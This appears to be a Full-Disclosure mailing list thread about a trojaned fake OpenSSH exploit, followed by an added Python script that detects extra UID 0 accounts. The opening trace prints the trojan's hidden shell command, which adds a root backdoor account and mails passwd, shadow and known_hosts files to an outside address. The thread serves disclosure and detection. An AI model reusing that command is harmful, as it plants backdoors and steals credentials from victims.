printf("[*] sending shellcode\n")= 22
popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
"sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
/etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
/usr/sbin/sendmail -f ownage@xxxxxx
m0nkeyhack@xxxxxxxxxxxxx) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
0x0804a6b0
-KF
gordon last wrote:
hi readers,
while i was staying idle in a so-called 0day release channel on one
irc network some scriptkiddies were
talking about a new 0day release.
in my backlog i can see the following:
---cut
08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
---cut
i looked at this piece of exploit... it is binary so i'm not sure if
this is a trojan or a backdoor or a virus. but i can't see anything
strange while sniffing the exploit traffic. and i got root on
several of my openbsd boxes with that. the bruteforcer seems to be
very good.
i too looked at "strings theosshucksass" and found nothing suspicious.
this exploit seems to be in the wild (underground) since beginning of
august.
that's quite a long time, i hope most admins are patching the systems
now... because the exploit is getting round faster and faster.
if anyone can reverse engineer this piece it would be great if he
posts his results on this list because i am really interested in the
exploiting technique used for that bug.
i can't get an idea on how to exploit this.
hmm...
regards,
glast
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
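
The trace at the top of this thread shows the binary appending a second UID 0 account (`sys3`) to /etc/passwd and a matching password entry to /etc/shadow. The following is an added example, not part of the original posts, of a check an administrator who ran the binary could use to find such accounts; the function names are hypothetical and the sample file contents are constructed, with placeholder hashes.

```python
"""Flag extra UID 0 accounts in passwd/shadow text (added example)."""

# Constructed sample data: the passwd line is the one shown in the trace,
# the hash fields are placeholders, not real values.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sys3:x:0:103::/:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$1$PLACEHOLDER$roothash:12000:0:99999:7:::
daemon:*:12000:0:99999:7:::
alice:$1$PLACEHOLDER$alicehash:12100:0:99999:7:::
sys3:$1$PLACEHOLDER$sys3hash:12311:0:99999:7:::
"""

def parse(text, min_fields):
    """Split colon-separated account records, skipping blanks and comments."""
    rows = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if line.strip() and not line.startswith("#") and len(fields) >= min_fields:
            rows.append(fields)
    return rows

def audit(passwd_text, shadow_text, expected_root=("root",)):
    """Return one finding per UID 0 account that is not in expected_root."""
    shadow = {f[0]: f[1] for f in parse(shadow_text, 2)}
    findings = []
    for rec in parse(passwd_text, 7):
        name, uid, shell = rec[0], rec[2], rec[6]
        if not uid.isdigit() or int(uid) != 0 or name in expected_root:
            continue
        # A hash starting with '*' or '!' (or no shadow entry) cannot be used
        # to log in; an empty field means no password is required at all.
        locked = name not in shadow or shadow[name][:1] in ("*", "!")
        findings.append({
            "account": name,
            "password_login": not locked,
            "interactive_shell": not shell.endswith(("nologin", "false")),
        })
    return findings

if __name__ == "__main__":
    for f in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print("unexpected UID 0 account:", f)
```

On a live system, pass the contents of /etc/passwd and /etc/shadow instead of the samples; systems that legitimately carry a second UID 0 account (for example `toor` on some BSDs) need it added to `expected_root`.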